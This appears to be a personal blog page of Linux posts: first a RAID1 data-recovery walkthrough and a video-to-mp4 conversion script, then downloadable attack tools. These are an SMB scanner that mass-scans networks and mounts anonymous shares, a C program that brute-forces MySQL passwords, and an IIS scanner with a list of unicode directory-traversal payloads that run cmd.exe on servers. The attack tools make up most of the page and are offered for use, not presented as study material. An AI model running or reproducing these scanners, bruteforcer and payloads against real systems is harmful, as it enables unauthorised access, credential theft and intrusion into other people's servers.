Rescue NFS Raid1 Data

Today i have done a mistake, i deleted with rm -rf some data at my WDCloud Mirror Gen2 with Raid1 over my NFS.

to rescue them i must mount the Raid1 disk at my PC

i tried to mount it (first i have figured out the partition with gparted)

root@pc:~# mkdir -p /media/nfsdisk 
root@pc:~# mount /dev/sdb2 /media/
mount: unknown filesystem type 'linux_raid_member'

examine /dev/sdb2

root@pc:~# mdadm --examine /dev/sdb2
/dev/sdb2:
          Magic : c54a7cba
        Version : 1.0
    Feature Map : 0x1
     Array UUID : 4151f8f8:4151f8f8:4151f8f8:4151f8f8
           Name : 1
  Creation Time : Thu Nov 19 12:21:47 2015
     Raid Level : raid1
   Raid Devices : 2

 Avail Dev Size : 5852141296 (2790.52 GiB 2996.30 GB)
     Array Size : 2926070648 (2790.52 GiB 2996.30 GB)
   Super Offset : 5852141552 sectors
          State : clean
    Device UUID : 22f64ef8:4151f8f8:413abe12:34ac24a6

Internal Bitmap : 2 sectors from superblock
    Update Time : Mon Jul 18 20:57:32 2016
       Checksum : 11e885b1 - correct
         Events : 226


   Device Role : Active device 0
   Array State : A. ('A' == active, '.' == missing)

 

 

i tried to mount it with

root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/sdb2 is busy - skipping

 

but it dont not work

root@pc:~# mdadm --stop /dev/md1
mdadm: stopped /dev/md1
root@pc:~# mdadm -A -R /dev/md1 /dev/sdb2
mdadm: /dev/md1 has been started with 1 drive (out of 2).
root@pc:~# mount /dev/md1 /media/nfsdisk
root@pc:~# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 1,8T 0 disk 
├─sda1 8:1 0 931,4G 0 part 
├─sda2 8:2 0 2,8G 0 part [SWAP]
└─sda3 8:3 0 928,7G 0 part /home
sdb 8:16 0 2,7T 0 disk 
├─sdb1 8:17 0 2G 0 part 
├─sdb2 8:18 0 2,7T 0 part 
│ └─md1 9:1 0 2,7T 0 raid1 /media/nfsdisk
├─sdb3 8:19 0 1G 0 part 
└─sdb4 8:20 0 1G 0 part 
sdc 8:32 0 1,8T 0 disk 
└─sdc1 8:33 0 1,8T 0 part 
sdd 8:48 0 111,8G 0 disk 
└─sdd1 8:49 0 111,8G 0 part /
sde 8:64 0 119,2G 0 disk 
└─sde1 8:65 0 119,2G 0 part 
sr0 11:0 1 4,2G 0 rom
root@pc:~# mount | grep md1
/dev/md1 on /media/nfsdisk type ext4 (rw)

hint at the end

root@pc:~# mdadm --assemble --scan

 

video 2 mp4 converter

created a new script for movie 2 mp4 convertion

features:

*  save metadata
* save creaton date
* delete greater files if you whant

#!/bin/bash
# 
# converter for video files to mp4
# this script delete also all huger files if you want
# please take care with DELETE FILES = yes
# double check our output first if the quality is good enough for you
# this script keeps metadata and date of creaton for the file
#
# written 2016/07/17 by Daniel Gohlke to clean up my NAS
#
# you need ffmpeg and some codecs, if i forget something please update this script
# sudo apt-get install libavcodec-extra-53 libavutil-extra-51 libavformat-extra-53 libx264-146 ffmpeg
# change what ever you need

EXTENSION_NEW="mp4"
DELETE_FILES="no"
DEFAULT_CRF="22" # some kind of medium
OUTPUT_DIR="output"

read -p "Please enter CRF Quality / higher value is lower quality [51 worst .. 0 Loseless (default $DEFAULT_CRF) ]: " CRF
CRF=${CRF:-$DEFAULT_CRF}
echo "convert with CRF $CRF"


# error handling
function finish {
  if [ $FILENAME ]; then
    echo "some error occoured, cleanup file $OUTPUT_DIR/$FILENAME.mp4"
    echo "Error on line $1"
    rm -f "$OUTPUT_DIR/$FILENAME.mp4"
  else
    echo "User Break, leave $d untouched"
  fi
  rm -f $OUTPUT_DIR/filelist.txt
}

# Trap if something failed
trap 'finish $LINENO' ERR
#trap 'finish $LINENO' EXIT


function start_convert {

 mkdir -p $OUTPUT_DIR
 find . -type f \( ! -iname "filelist.txt" \) | grep -v "$OUTPUT_DIR" > $OUTPUT_DIR/filelist.txt 
   for d in $( cat $OUTPUT_DIR/filelist.txt ); do
#  for d in *; do
    echo "converting with crf $DEFAULT_CRF $d";
    FILENAME=$(basename "$d")
    EXTENSION="${FILENAME##*.}"
    FILENAME="${FILENAME%.*}"
    
    # convert
    ffmpeg -stats -i $d -c:v h264 -strict experimental -crf $CRF -map_metadata 0 $OUTPUT_DIR/$FILENAME.mp4

    # pply another file's attributes to new file
    touch -r $d $OUTPUT_DIR/$FILENAME.mp4    
    FILESIZE_OLD=$(stat -c%s "$FILENAME.$EXTENSION")
    FILESIZE_NEW=$(stat -c%s "$OUTPUT_DIR/$FILENAME.$EXTENSION_NEW")
#    echo $FILESIZE_OLD  
#    echo $FILESIZE_NEW
    
    if [ "$DELETE_FILES" == "yes" ]; then
      echo "delete greater files is turned on"
  
      if [ "$FILESIZE_OLD" -ge "$FILESIZE_NEW" ]; then
        echo "delete $FILENAME.$EXTENSION"
        rm -f $FILENAME.$EXTENSION
      else 
       echo "delete $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW"
       rm -f $OUTPUT_DIR/$FILENAME.$EXTENSION_NEW
      fi
        
    else 
      echo "delete greater files is turned off"
    fi
    
  done

rm -f $OUTPUT_DIR/filelist.txt
exit 0
}

#ffmpeg -stats -i 0621232021DVB-TDasErste.m4v -c:v h264 -strict experimental -crf 20 -map_metadata 0  FILENAMEdefaultcrf20.mp4

# Start Program
read -p "Do you wish to start convert your videos? (y/n)" yn
case $yn in
  [Yy]* ) start_convert;;
  [Nn]* ) exit;;
   * ) echo "Please answer yes(y) or no(n).";;
esac

 

link to github: https://github.com/danielgohlke/scripts/blob/master/converttomp4.sh

 

 

SMBScan version 1.2

Simple Smb Scanner written in Bash for linux for newer systems with zmap support
smbscan-1.2.tar.gz
(Download all) for new systems (2015) with zmap and so on
– added zmap support
– replaced smbmount with mount
– removed dialog an whiptail

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
MNT=/bin/mount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
ZMAP=/usr/sbin/zmap
CHARSET="iso8859-1"
TIMEOUT=2
usage() { echo "Usage: $0 [-z number of hosts (zmap)] [-n ip/range (nmap)]" 1>&2; exit 1; }

while getopts "n:z:" opt; do
  case "$opt" in
    n)
      echo "using nmap with ${OPTARG}" >&2
      NMAPSCAN=1
      test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
      IP=${OPTARG}
      ;;
    
    z)
      echo "using zmap with ${OPTARG} hosts" >&2
      ZMAPSCAN=1
      test -x $ZMAP || { echo -e 'zmap not found !';exit 1; }
      z=${OPTARG}
      ;;
    h)
      echo "Invalid option: -$OPTARG" >&2
      usage
      ;;
    *)
      echo "Option -$OPTARG requires an argument. " >&2
      usage
      exit 1
      ;;
  esac

done

if [ -z $ZMAPSCAN ] && [ -z $NMAPSCAN ]; then
   usage
fi

shift $((OPTIND-1))


test -x $MNT || { echo -e 'mount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }


function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
        echo "Written by cd ;)"
        echo "Scan started against to $1 on port 139"
        echo "This can take a while"


if [ "$NMAPSCAN" = 1 ] 
    then
          echo "search via nmap at ip/range ${n} for hosts who has opened port 139"
      $NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
      cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
else
          echo "search via zmap for ${z} hosts who has opened port 139"
      $ZMAP -N ${z} -p 139 -B 1M -q -o ./out 
          sed -i '1d' ./out #delete first line "saddr" for csv
fi
shift $((OPTIND-1))

    
rm -f ./$IP.out
check_it

if [ $SUM = 0 ]
    then 
    echo "Sorry
    No SMB Server found !
        
      Thanks for use ... "
   rm -f ./out
   exit 1
fi

    echo "Please wait...
      Searching 4 Shared Directories"
while read host ;
    do
    # Get Computer name
    echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
    name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

    # Get Workgroup name
    workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

    # if name not set so use this one
    workgroup=${workgroup:=WORKGROUP}

    name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
    echo "Searching name via nmblookup (M)"
    name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
    echo "Searching Name via nmblookup (H)"
    name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
    echo "Searching Name via Smbclient ... using Servername"
    name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}


    
    # search for shared folders
    echo "looking for shared directorys on $host"
    # kill old sleep process
    kill -9 `pidof sleep` 2&>1
    $SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
    sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1
        
        exist=0
        while read LIST ;
                do
            exist=1
            #make directory for the shares
            mkdir -p ./"$name-$host/$LIST"
            #add a logfile
            #touch ./"$name-$host/ip-is-$host"
                    $MNT -t cifs -o guest,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t cifs -o user=nobody,iocharset=utf8,_netdev //$host/$LIST ./$name-$host/$LIST
                    $MNT -t nfs $host:/$LIST ./$name-$host/$LIST


        echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
        if [ $exist = 1 ]
        then
            #write some useful or not very useful informations into a log 
            echo " 
            $name - $host
            Last found: `date`
            Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
        fi
        done < ./$host.shares

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
    echo "
SMBScan v 1.2 -> listing mounted smb file systems

`cat ./mounts | more`
"
rm -f ./mounts
rm -f ./out

umountall.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount -f */*

Samba / Netbios network scanner (SMBScan) for Linux

Simple Smb Scanner written in Bash for linux for oder Systems

smbscan-1.1.tar (Download all) for older systems (anno 2006)

smbscan.sh

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
#rm -f *.out

if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

FILESYSTEM=cifs
SMBM=/usr/bin/smbmount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
DIALOG=/usr/bin/dialog
#WHIP=/usr/bin/whiptail
CHARSET="iso8859-1"
# BUNT 1 = Console
# BUNT 0 = with Whiptail or dialog graphics
BUNT=1
TIMEOUT=5

#test -x $WHIP
test -x $DIALOG && DIALOG=$DIALOG
#test -x $WHIP || BUNT=0
test -x $SMBM || { echo -e 'smbmount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }
# hehe i know that suxx ;)
clear

function script_kiddie() {
if [ $BUNT -eq 1 ]
then
    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.1"
	else
	    $DIALOG --title "v 1.1" --infobox " ScR1p7k1dDi3 Pr0t3c7 Sy5t3m" 6 20
fi
exit 1 
}
script_kiddie

if [ $# -eq 1 ]
then
    echo "$1" > ./out
        else
	    $DIALOG --title "SMBscan v.1.1" --inputbox "                Written by cd ;)

Please enter IP range
e.g 10.0.0.1-24 or 10.0.1-255.5-30
or type ./smbscan 10.0.0.1-254

http://www.bastardo.de <- get newest version" 13 50 2> ./out
fi

function check_it(){
SUM=0
X=`cat ./out | wc -c`
SUM=`expr $SUM + $X`
}
if [ $BUNT -eq 1 ]
    then
#	test -e $1 || { echo -e "$0 [ip room]"; exit 1; }
	    echo "Written by cd ;)"
	    echo "Scan started against to $1 on port 139"
	    echo "This can take a while"
fi

check_it
IP=`cat ./out`
rm -f ./out
# i think that is the fastest, we whant to scan only 1 port ... not more 
$NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
rm -f ./$IP.out
check_it
if [ $SUM = 0 ]
    then 
	if [ $BUNT -eq 1 ]
	    then
echo "
    No SMB Server found.

      Thanks for use ..."
		rm -f ./out
		exit 1
		    else
			$DIALOG --title "Sorry" --infobox "
    No SMB Server found !

      Thanks for use ... " 7 30
			rm -f ./out
			exit 1
	fi
fi

if [ $BUNT -eq 1 ]
    then
	echo "Please wait...
      Searching 4 Shared Directories"
	else
	    $DIALOG --infobox "Please wait !
Searching 4 Shared Directories..." 5 40
fi
while read host ;
    do
	# Get Computer name
	echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
	name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

	# Get Workgroup name
	workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

	# if name not set so use this one
	workgroup=${workgroup:=WORKGROUP}

	name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
	echo "Searching name via nmblookup (M)"
	name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
	echo "Searching Name via nmblookup (H)"
	name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
	echo "Searching Name via Smbclient ... using Servername"
	name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    name=${name:=NAME_NOT_FOUND}

	# search for shared folders
	echo "looking for shared directorys on $host"
	# kill old sleep process
	kill -9 `pidof sleep` 2&>1
	$SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
	sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1

	    exist=0
	    while read LIST ;
	    		do
		    exist=1
		    #make directory for the shares
		    mkdir -p ./"$name-$host/$LIST"
		    #add a logfile
		    #touch ./"$name-$host/ip-is-$host"
		    $SMBM "//$host/$LIST" "./$name-$host/$LIST" -o defaults,guest,iocharset=utf8

			if [ $BUNT -eq 1 ]
			    then
				echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
			    else
				$DIALOG --infobox  "trying to mount //$host/$LIST into ./$name/$LIST" 10 60
			fi
		if [ $exist = 1 ]
		then
		    #write some useful or not very useful informations into a log 
		    echo " 
		    $name - $host
		    Last found: `date`
		    Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
		fi
	    done < ./$host.shares
#	    echo `mount | $GREP cifs | grep $host` >> ./"$name-$host/ip-is-$host"

rm -f ./$host.shares
done < ./out

mount | $GREP $FILESYSTEM > ./mounts
if [ $BUNT -eq 1 ]
    then
	echo "
SMBScan v 1.1 -> listing mounted smb file systems

`cat ./mounts | more`
"
    else
	$DIALOG --title "SMBScan v 1.1 -> listing mounted smb file systems" --textbox mounts 10 60
fi
rm -f ./mounts
rm -f ./out

 

The unmount script

umount.sh

#!/bin/sh
#get forced
echo "unmounting smb file systems (force)"
umount */*/*
#umount `mount | grep smbfs | awk '{print $3}'`
kill -9 `ps aux | grep mount.cifs | awk '{print $2}'`

 

The Makefile for „make install“

PREFIX=/usr/sbin/
install:
	@cp smbscan.sh $(PREFIX)
	@cp umountall.sh $(PREFIX)

uninstall:
	@rm $(PREFIX)smbscan.sh
	@rm $(PREFIX)umountall.sh

 

 

MySQL Bruteforce for Linux and Windows

Linux Source and Binarys

mysql-bruteforce.c (Sourcecode)
mysql-bruteforce.tar
(sourcecode tarball)
mysql-bruteforce-binary-only.tar (compiled Binary)
You need to install ncurses

apt-get install libncurses5-dev libncurses5

Windows Source and Binarys

mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows

Here is the Source (Linux)

#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>

// Deutsch oder English
#define GER 1
#define ENG 0
/*
**************************************************************************************************
*  MYSQL Bruteforce Programm aus purer lange Weile geschrieben 
*   23.03 2010 by cd 
*
*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
*   oder -O6 anstatt -O2
*  ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
*  log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
*  for the people that understand no german change the #define ENG to 1 and GER to 0
*
*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
*  or -O6 instead of -O2
*  usage: ./mysql-bruteforce user host <password list> <optional len of password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
*   Newest version http://bruteforce.at/mysql
*
*   Think about the old good time MoD
*   If you want to survive out here, you've got to know where your towel is.
*/

MYSQL *my;

int count=0;
char *passwd;

#define STARTCHR 46 // 33 set start ascii char
#define ENDCHR 122  // 127 set end ascii cahr
#define BUFF_SIZE 1024
#define LEN 80

char buffer[BUFF_SIZE];
int jump=0;

int main (int argc, char *argv[])
{
if (argc <= 3 )
    {
#if ENG && !GER
    printf("\n"
    "\n   MySQL Bruteforce, written by cd\n\n"
    "    via wordlist\n"
    "    %s root localhost wordlist       # use complete wordlist\n"
    "    %s root 127.0.0.1 ../wordlist 7  # serch only words with 7 chars\n"
    "\n"
    "    standard bruteforce\n"
    "    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\n"
    "    %s root 127.0.0.1 -b 12   # up to 12 chars\n"
    "    %s root host -b 12 Test   # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
    printf("\n"
    "\n   MySQL Bruteforce, geschrieben von cd\n\n"
    "    via Wörterliste\n"
    "    %s root localhost wordlist       # Gesamte Wörterliste durchsuchen\n"
    "    %s root 127.0.0.1 ../wordlist 7  # suche nur Wörter mit 7 Buchstaben\n"
    "\n"
    "    Standard Bruteforce\n"
    "    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
    "    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\n"
    "    %s root host -b 12 Test   # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
    return 0;
    }

if(strcmp(argv[3],"-b")) 
    {
	jump=0;
    } else jump=1;

    initscr();
    printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
    refresh();

    char host[20];
    char user[20];
    my = mysql_init(NULL);
    FILE *pass_list,*logfile;

if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) 
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

    if(my == NULL)
	{
#if ENG && !GER
	    fprintf(stderr, "Initialization failed\n");
#else
	    fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
	    endwin();
	    return 0;
	}

sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);

char eingabe;

#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif

if (jump==1)
{
refresh();
eingabe='b';

}
else {eingabe='w';}

switch(eingabe)
{
case 'b':
while(1)
{
    int min=1,max;
    if (argc<=4)
	{
	    max=8;
	}
	    else 
	    {
		max=atoi(argv[4]); 
	    }

    char *pass=(char*)malloc(min);
    int pos,x,found; 

	    pass[min]='\0';

    if (argc>=6)
	{ 
	    min=strlen(argv[5]);
	    pass=argv[5];
	    pass[min+1]='\0';
	    pos=min;
	    if (atoi(argv[4])!=strlen(argv[5]))
		{
#if ENG && !GER
		 mvprintw(7,0,"len of word must be the same the digit after -b\n"
		 "like: %s root localhost -b 4 abcd\n",argv[0]);
#else
		 mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
		 "z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
		 refresh();
		 endwin();
		 return 0;
		 }

	}

    for(x=min;x<=max;x++)
	{
	    if(x>min)
		{
		    if (realloc(pass, x)) 
			{
			    memset(pass, STARTCHR, x);
			    pass[x]='\0';
			} else {
				    mvprintw(13,1,"error in realloc");
				    endwin(); 
				    return 1;
				}
		}
	    while(pass[0]<ENDCHR)
		{
		    found=0;
		    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)
			{
			    move(6,2);
			    deleteln();
			    mvprintw(6,2,"Pass: %s",pass);
			    refresh();
			}
			else
			    {
				move(6,2);
				deleteln();
				mvprintw(6,2,"Pass: %s",pass);
				refresh();
#if ENG && !GER
				mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
				mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
				refresh();
				endwin();
				mysql_close(my);
				fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
				return 0;
			    }

		    for(pos=x-1;pos!=0;pos--)
			{
			    if(pass[pos]==ENDCHR)
				{
				    memset(pass+pos, STARTCHR, strlen(pass)-pos);
				    pass[pos-1]++;
				    found=1;
				    break;
				}
			}

		    if(!found)
			pass[x-1]++;
			count++;
		}
	}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
break;
}

int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
    if (argv[4])
	{
	    if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
	}

    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)
	{
	    move(6,2);
	    deleteln();
	    mvprintw(6,2,"Pass: %s",buffer);
	    refresh();
	}
	else
	    {
		move(6,2);
		deleteln();
		mvprintw(6,2,"Pass: %s",buffer);
		refresh();
#if ENG && !GER
		mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
		mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
		refresh();
		endwin();
		mysql_close(my);
		fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
		return 0;
	    }
next:
dummy=1;
}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}

 

 

IISscan shell script

IIS Scanner

you can find this script also at http://packetstormsecurity.com/

head.cmd

HEAD / HTTP/1.0

iisscan.sh

#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
clear
if [ $# -ne 2 ]
    then
	echo "$0 [ip room] [outputfile]" >&2
	exit 0
	else
	    echo "Written by cd ;)"
	    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
	    echo "Scan started against to $1 on port 80"

	echo "This can take a while"
	nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
	cat $1.out | grep open | cut '-d ' -f 2 > $2
	fi
rm $1.out
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of any http server!!!

      Thanks for use ..."
	rm $2
	exit 1
    fi

echo "Please wait... 
      Testing server versions"
    while read host ;
	do 
	     echo "         Get http server version from: $host"
	    netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
	done < $2
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of IIS 

      Thanks for use ..."
	rm hosts.$1.tmp
	rm $2
	exit 1
    fi
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
touch $2.exp
while read host;
 do 
 echo "Try to Exploit $host"
 while read unicodes;
 do
 echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
 sum=0
    g=`cat fluff | wc -c`
    sum=`expr $sum + $g`
    if [ $sum = 0 ]
	then 
	    echo "try $unicodes"
	    else 
		echo "$host is Exploitable with $unicodes"
		echo $host >>$2.exp
    fi
    done < unicodes.txt
 done < $2
rm fluff
sum=0
g=`cat $2.exp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
	rm $2.exp
echo "
      No matches of Exploitable IIS
      In  >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "
	exit 1
    fi
echo "

      You can find a list of Exploitable IIS in >> $2.exp << 
      and in >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "

an old list of Unicodes
unicodes.txt

GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
